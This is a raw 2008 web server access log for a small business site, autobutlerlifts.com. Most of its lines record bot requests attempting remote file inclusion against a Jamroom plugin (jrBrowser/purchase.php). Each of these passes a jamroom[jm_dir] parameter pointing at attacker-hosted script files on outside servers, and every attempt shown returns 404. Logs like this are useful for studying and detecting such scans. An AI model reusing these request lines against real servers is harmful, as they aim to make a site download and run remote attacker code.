83.64.132.254 - - [05/Nov/2008:19:07:12 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.autobutlerlifts.com"
83.64.132.254 - - [05/Nov/2008:19:07:12 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.autobutlerlifts.com"
83.64.132.254 - - [05/Nov/2008:19:07:12 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.autobutlerlifts.com"
219.85.63.226 - - [05/Nov/2008:19:09:33 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
219.85.63.226 - - [05/Nov/2008:19:09:33 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
219.85.63.226 - - [05/Nov/2008:19:09:33 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
128.121.94.91 - - [05/Nov/2008:19:44:24 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.minart.org/bbs/data/ids.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.autobutlerlifts.com"
128.121.94.91 - - [05/Nov/2008:19:44:24 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.minart.org/bbs/data/ids.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.autobutlerlifts.com"
66.249.71.81 - - [05/Nov/2008:19:49:29 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [05/Nov/2008:19:49:29 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [05/Nov/2008:22:53:06 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [05/Nov/2008:22:53:06 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [05/Nov/2008:22:53:06 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
74.6.22.87 - - [06/Nov/2008:01:27:58 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
74.6.22.87 - - [06/Nov/2008:01:28:16 -0800] "GET /_private/ HTTP/1.0" 200 514 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
66.249.71.80 - - [06/Nov/2008:02:22:58 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [06/Nov/2008:02:22:58 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
74.6.17.162 - - [06/Nov/2008:04:21:14 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
74.6.17.162 - - [06/Nov/2008:04:21:33 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
66.249.71.82 - - [06/Nov/2008:05:30:29 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [06/Nov/2008:05:30:29 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [06/Nov/2008:05:33:31 -0800] "GET /googlee916a1106382fa83.html HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.40.52.137 - - [06/Nov/2008:06:44:43 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.enjoykankoku.jp/parti/idih.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.autobutlerlifts.com"
66.40.52.137 - - [06/Nov/2008:06:44:43 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.enjoykankoku.jp/parti/idih.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.autobutlerlifts.com"
66.40.52.137 - - [06/Nov/2008:06:44:43 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.enjoykankoku.jp/parti/idih.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.autobutlerlifts.com"
74.6.22.87 - - [06/Nov/2008:07:11:26 -0800] "GET /_private/?M=A HTTP/1.0" 200 514 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
66.249.71.81 - - [06/Nov/2008:08:45:37 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [06/Nov/2008:09:06:22 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [06/Nov/2008:09:06:22 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
74.6.22.170 - - [06/Nov/2008:09:12:40 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
74.6.22.170 - - [06/Nov/2008:09:13:11 -0800] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
213.247.43.5 - - [06/Nov/2008:10:14:37 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
218.145.65.133 - - [06/Nov/2008:10:17:52 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.autobutlerlifts.com"
218.145.65.133 - - [06/Nov/2008:10:17:52 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.autobutlerlifts.com"
213.247.43.5 - - [06/Nov/2008:10:39:19 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
213.247.43.5 - - [06/Nov/2008:10:39:19 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
213.247.43.5 - - [06/Nov/2008:10:39:19 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
74.7.219.93 - - [06/Nov/2008:10:40:16 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "autobutlerlifts.com"
74.7.219.93 - - [06/Nov/2008:10:40:16 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "autobutlerlifts.com"
66.36.231.160 - - [06/Nov/2008:10:47:38 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.autobutlerlifts.com"
66.36.231.160 - - [06/Nov/2008:10:47:38 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.autobutlerlifts.com"
66.36.231.160 - - [06/Nov/2008:10:47:39 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.autobutlerlifts.com"
74.7.219.93 - - [06/Nov/2008:10:48:35 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
74.7.219.93 - - [06/Nov/2008:10:48:35 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
74.7.219.93 - - [06/Nov/2008:10:48:35 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
218.145.65.133 - - [06/Nov/2008:10:55:15 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.autobutlerlifts.com"
218.145.65.133 - - [06/Nov/2008:10:55:15 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.autobutlerlifts.com"
218.145.65.133 - - [06/Nov/2008:10:55:16 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.autobutlerlifts.com"
218.145.65.133 - - [06/Nov/2008:10:55:17 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.autobutlerlifts.com"
218.145.65.133 - - [06/Nov/2008:10:55:18 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.autobutlerlifts.com"
218.145.65.133 - - [06/Nov/2008:10:55:18 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.autobutlerlifts.com"
87.106.4.70 - - [06/Nov/2008:11:28:04 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
91.194.91.196 - - [06/Nov/2008:11:44:26 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.autobutlerlifts.com"
193.95.93.158 - - [06/Nov/2008:11:45:48 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
66.249.71.81 - - [06/Nov/2008:11:54:27 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [06/Nov/2008:11:54:27 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
87.106.4.70 - - [06/Nov/2008:11:56:24 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
87.106.4.70 - - [06/Nov/2008:11:56:24 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
87.106.4.70 - - [06/Nov/2008:11:56:25 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
193.95.93.158 - - [06/Nov/2008:12:22:07 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
193.95.93.158 - - [06/Nov/2008:12:22:07 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
193.95.93.158 - - [06/Nov/2008:12:22:07 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
91.194.91.196 - - [06/Nov/2008:12:35:31 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.autobutlerlifts.com"
91.194.91.196 - - [06/Nov/2008:12:35:31 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.autobutlerlifts.com"
91.194.91.196 - - [06/Nov/2008:12:35:31 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.autobutlerlifts.com"
66.249.71.80 - - [06/Nov/2008:12:41:54 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [06/Nov/2008:12:41:54 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
200.49.188.178 - - [06/Nov/2008:12:49:03 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
66.249.71.82 - - [06/Nov/2008:13:41:19 -0800] "GET /googlee916a1106382fa83.html HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
200.49.188.178 - - [06/Nov/2008:14:28:59 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
200.49.188.178 - - [06/Nov/2008:14:29:00 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
200.49.188.178 - - [06/Nov/2008:14:29:00 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
89.159.202.119 - - [06/Nov/2008:15:09:18 -0800] "GET /logs/access.log HTTP/1.0" 200 114907 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [06/Nov/2008:15:17:21 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [06/Nov/2008:15:17:21 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
70.255.170.233 - - [06/Nov/2008:16:07:59 -0800] "GET /logs/ HTTP/1.0" 200 3073 "-" "Wget/1.5.3.1" "autobutlerlifts.com"
70.255.170.233 - - [06/Nov/2008:16:08:05 -0800] "GET /logs/ HTTP/1.0" 200 3073 "-" "Wget/1.5.3.1" "autobutlerlifts.com"
71.246.19.117 - - [06/Nov/2008:16:11:02 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.autobutlerlifts.com"
71.246.19.117 - - [06/Nov/2008:16:11:02 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "autobutlerlifts.com"
71.246.19.117 - - [06/Nov/2008:16:11:11 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://www.autobutlerlifts.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.autobutlerlifts.com"
71.246.19.117 - - [06/Nov/2008:16:11:19 -0800] "GET /index.htm HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.autobutlerlifts.com"
71.246.19.117 - - [06/Nov/2008:16:11:24 -0800] "GET /index.html HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.autobutlerlifts.com"
66.249.71.80 - - [06/Nov/2008:17:05:59 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [06/Nov/2008:17:05:59 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
205.188.117.72 - - [06/Nov/2008:17:15:03 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
205.188.117.72 - - [06/Nov/2008:17:15:10 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
66.249.71.82 - - [06/Nov/2008:17:55:00 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [06/Nov/2008:17:55:00 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
201.6.121.12 - - [06/Nov/2008:17:57:12 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.felipeftp.t35.com/sca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "autobutlerlifts.com"
201.6.121.12 - - [06/Nov/2008:17:57:12 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.felipeftp.t35.com/sca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "autobutlerlifts.com"
208.80.194.32 - - [06/Nov/2008:18:01:06 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Maxthon 2.0)" "autobutlerlifts.com"
201.6.121.12 - - [06/Nov/2008:18:24:53 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.felipeftp.t35.com/sca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
201.6.121.12 - - [06/Nov/2008:18:24:53 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.felipeftp.t35.com/sca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
201.6.121.12 - - [06/Nov/2008:18:24:53 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.felipeftp.t35.com/sca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
80.67.21.95 - - [06/Nov/2008:19:21:58 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "autobutlerlifts.com"
80.67.21.95 - - [06/Nov/2008:19:22:08 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "autobutlerlifts.com"
74.6.17.153 - - [06/Nov/2008:19:37:27 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
74.6.17.153 - - [06/Nov/2008:19:38:09 -0800] "GET /logs/ HTTP/1.0" 200 3073 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
80.67.21.95 - - [06/Nov/2008:19:42:51 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
80.67.21.95 - - [06/Nov/2008:19:42:51 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
80.67.21.95 - - [06/Nov/2008:19:42:51 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
208.69.115.3 - - [06/Nov/2008:19:49:56 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://6l0zt.com/technote7/data/image/cepid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
208.69.115.3 - - [06/Nov/2008:19:49:56 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://6l0zt.com/technote7/data/image/cepid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
208.69.115.3 - - [06/Nov/2008:19:49:56 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://6l0zt.com/technote7/data/image/cepid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
218.38.34.152 - - [06/Nov/2008:19:56:14 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://83.12.246.234/~jarek/galeria/stats.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
218.38.34.152 - - [06/Nov/2008:19:56:14 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://83.12.246.234/~jarek/galeria/stats.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
218.38.34.152 - - [06/Nov/2008:19:56:14 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://83.12.246.234/~jarek/galeria/stats.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
218.38.34.152 - - [06/Nov/2008:20:03:00 -0800] "GET /logs/access.log%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://83.12.246.234/~jarek/galeria/stats.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
66.249.71.81 - - [06/Nov/2008:21:13:30 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [06/Nov/2008:21:13:30 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
74.6.17.153 - - [06/Nov/2008:23:21:45 -0800] "GET /?N=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
66.249.71.80 - - [06/Nov/2008:23:49:14 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [06/Nov/2008:23:49:14 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
208.80.194.32 - - [07/Nov/2008:00:50:12 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={F65358C8-496C-4b9b-8FD4-001EECBE86F8}; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.autobutlerlifts.com"
70.85.192.194 - - [07/Nov/2008:01:33:29 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r00x.helloweb.eu/s/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.autobutlerlifts.com"
70.85.192.194 - - [07/Nov/2008:01:41:26 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r00x.helloweb.eu/s/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "autobutlerlifts.com"
